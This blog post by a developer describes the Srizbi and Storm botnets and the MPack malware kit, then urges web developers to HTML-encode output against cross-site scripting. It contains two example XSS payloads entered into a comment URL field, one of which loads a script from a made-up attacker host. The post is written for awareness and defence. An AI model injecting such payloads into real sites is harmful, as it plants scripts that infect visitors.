I'm sure you've been told, numerous times no doubt, about Cross-site scripting and that it's bad. I think, for most developers, the only fear they have of XSS is looking foolish when someone hacks their site, shredding the layout of their pages and sending popups all over the screen. At least that's what I thought a while back. And it's all because I didn't quite get the depth of the soul-corroding evil that uses XSS as a primary attack point. Nor how pervasive it is.

Come with me, friends, on a Dante's journey into the black, horrible, dirty depths of the Botnet -  The Hordes of zombie drone computers on the internet that work to Enlarge your Penis, sell you Cialis, and melt your face.

An Inconvenient Zombie Death Army
I was studying up today on a book I'm writing (the security chapter) and I decided to devote the afternoon to  getting to know more about spam, spammers, and the viruses they write. I know that most machines, when they get infected with a trojan or worm, become part of a larger network which coordinates distributed sending of nasty email. What I didn't know just how evil these things really are (from Wikipedia):

The [Storm] botnet reportedly is powerful enough as of September 2007 to force entire countries off the Internet, and is estimated to be capable of executing more instructions per second than some of the world's top supercomputers. However, it is not a completely accurate comparison, according to security analyst James Turner, who said that comparing a botnet to a supercomputer is like comparing an army of snipers to a nuclear weapon

If that made you catch your breath a bit, read on...

At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms. According to Joshua Corman, an IBM security researcher, "This is the first time that I can remember ever seeing researchers who were actually afraid of investigating an exploit."

It's one of those things that you really don't want to know about; but it's really hard to pull yourself out once you're in. This rat-hole goes very, very deep. But is it all real? Or is it just some hyped up marketing prattle to get you to buy an Antivirus? You decide for yourself.

The Picture of Evil: The Srizbi Trojan
Srizbi is only a few years old and is most likely a mutation of one of its precursors. It's a very small trojan, but it packs one hell of a punch (emphasis mine):

Apart from having an efficient spam engine, the trojan is also very capable in hiding itself from both the user and the system itself, including any products designed to remove the trojan from the system. The trojan itself is fully executed in kernel mode and has been noted to employ rootkit-like technologies to prevent any form of detection. By patching the NTFS file system drivers, the trojan will make its files invisible for both the operating system and any human user utilizing the system. The trojan is also capable of hiding network traffic it generates by directly attaching NDIS and TCP/IP drivers to its own process, a feature currently unique for this trojan. This procedure has been proved to allow the trojan to bypass both firewall and sniffer protection on the system.

Once the bot is in place and operational, it will contact one of the hardcoded servers from a list it carries with it. This server will then supply the bot with a zip file containing a number of files required by the bot to start its spamming business. The following files have been identified to be downloaded:

1. 000_data2 - mail server domains
2. 001_ncommall - list of names
3. 002_senderna - list of possible sender names
4. 003_sendersu - list of possible sender surnames
5. config - Main spam configuration file
6. message - HTML message to spam
7. mlist - Recipients mail addresses
8. mxdata - MX record data

When these files have been received, the bot will first initialize a software routine which allows it to remove files critical for revealing spam and rootkit applications. After this procedure is done, the trojan will then start sending out the spam message it has received from the control server.

This trojan actually patches the NTFS file system in a sort of "Jedi mindtrick" which tells it "I am not the trojan you're looking for". Not only that, it's able to talk DIRECTLY to the TCP/IP drivers, and hide in their cargo hold on the way out of the server bay. That, friends, is nutso.

The most insidious part of all of this is that Srizbi is written using this toolset called MPack, which is a PHP-based, commercially available malware kit. Yes, that's correct - it's a malware SDK:

Unusual for such kits, MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits. Modules are sold by the developers containing new exploits. These cost between $50 and $150 US depending on how severe the exploit is. The developers also charge to make the scripts and executables undetectable by antivirus software.

This malware kit is especially effective at exploiting XSS holes in websites that aren't entirely prepared for XSS:

The server-side software in the kit is able to customize attacks to a variety of web browsers including Microsoft Internet Explorer, Mozilla Firefox and Opera. MPack generally works by being loaded in an IFrame attached to the bottom of a defaced website. When a user visits the page, MPack sends a script that loads in the IFrame and determines if any vulnerabilities in the browser or operating system can be exploited. If it finds any, it will exploit them and store various statistics for future reference.

Included with the server is a management console, which allows the attacker deploying the software to view statistics about the computers that have been infected, including what web browsers they were using and what countries their connections originated from.

In fact, it's been estimated that if it weren't for XSS, propagation of spam trojans like Srizbi would drop dramatically. As it stands, the network propagates itself using "Stupid Theme", wherein people are sent emails that say "we have video of you naked, click here". The subject matter changes (from naked celebrities to instant fortunes) but occasionally people end up clicking on them, get sent to a compromised site, then BAM, another drone is born.

Evil's Super Evil Twin: The Storm Worm
The Storm worm is like Srizbi, but just a tad scarier. It's spread by a system of servers that utilize a DNS-switching routine called "fast flux". Fast flux involves using  one or more zombie hosts as a DNS proxy (singular or in series), and the de-registering/re-registering address records and aliases up to twice a minute. This server army is literally impossible to locate and therefore makes the Storm botnet sort of unstoppable.

The thing that sets the Storm botnet (the fleet of zombie computers infected with the worm) apart is that it's actually capable of defending itself - on its own:

The Storm botnet was observed to be defending itself, and attacking computer systems that scanned for Storm virus-infected computer systems online. The botnet will defend itself with DDoS counter-attacks, to maintain its own internal integrity. At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms.

Mess with the worm, get the DDoS horns. More from Joshua Corman:

"If you try to attach a debugger, or query sites it's reporting into, it knows and punishes you instantaneously. [Over at] SecureWorks, a chunk of it DDoS-ed a researcher off the network. Every time I hear of an investigator trying to investigate, they're automatically punished. It knows it's being investigated, and it punishes them. It fights back," Corman said.

The crazy part about all of this is that no one's really sure  just how big this zombie death army is, after all it doesn't want to be seen, and doesn't want you know it's there. These guys make money on a very weird scale: only 1 in 10 million spam emails sent results in payment - therefore to make more money you need to send more email. If you're busy being evil, you're not sending mail. Moreover you're exposing yourself and your operation - it's best to remain silent and hidden, growing your Death Army one machine at a time:

According to Matt Sergeant, chief anti-spam technologist at MessageLabs, "In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just 2 million of its machines. It's very frightening that criminals have access to that much computing power, but there's not much we can do about it." It is estimated that only 10%-20% of the total capacity and power of the Storm botnet is currently being used.

Spam is organized, sophisticated, and utterly morose and evil. It goes beyond annoying when you consider the power these guys have at their fingertips, and that we just can't catch them. But there is something you can do, and it's so small and so very, very simple. In fact it's only 10 little letters:

Html.Encode

Why, you may ask? Because a primary vector of release for these things is from script-injection, where the bad guys use your site to link off to a zombie host, which contains the nasty-script that wants to eat your computer's face. You can do something about this - and you should!

You Are Not Prepared
Over the last year, people have been very quick to point out that many of the samples I've created have been vulnerable to XSS. Sheepishly I've made the fix, each time, kicking myself for being lame. We didn't need to worry about this so much with Web Forms, but with MVC and hand-rolling HTML, the issue is become greater, and more awareness is needed.

Yesterday as I was reading over Oxite's source code with Damien Guard (this is not to pick on them - just an illustration how easy it is to let stuff slip), I entered this in to the URL field of the comments:

"><script>alert("ha ha ha I suck");</script><a href="

Update This has been fixed at MIX online - please don't bother trying.

And wouldn't ya know it - it worked perfectly - popping up a really annoying message every time I opened the page up. This happened every time, because the database saved the comment, then planted my nasty script every time the page loaded - this is called "passive script injection".

Now if I was evil, I could have done something like this (of course this URL is fake):

"></a><script src=http://srizbitrojan.mynastyninjasite.com/spreadbadness.js></script> <a href="

This is the comment author's URL, and his name will be linkable even if you have this script line in there. If I had my hands on MPack, who knows what kind of stuff I could have done!

To get around this, all the developer needed to do was to

1. Be aware of the evil that lies behind XSS, and why it wants to melt your face and eat your children and
2. Use Html.Encode() on ANYTHING that is output on a page.

Please, for the children, encode your output.

Further Reading
I had a really good time investigating the chapter I'm writing, and if you're interested in any of the above, here are some links to get you started. It's good stuff to know, but you'll get dirty along the way:

• http://en.wikipedia.org/wiki/Srizbi_botnet
• http://www.nationaljournal.com/njmagazine/cs_20080531_6948.php
• http://en.wikipedia.org/wiki/Storm_botnet
• Worm 'Storm' gathers strength
• Storm Botnet storms the Net
• Meet Srizbi, the Largest Botnet Ever
• Mpack installs ultra-invisible Trojan
• One of the biggest threats to Internet users today: Srizbi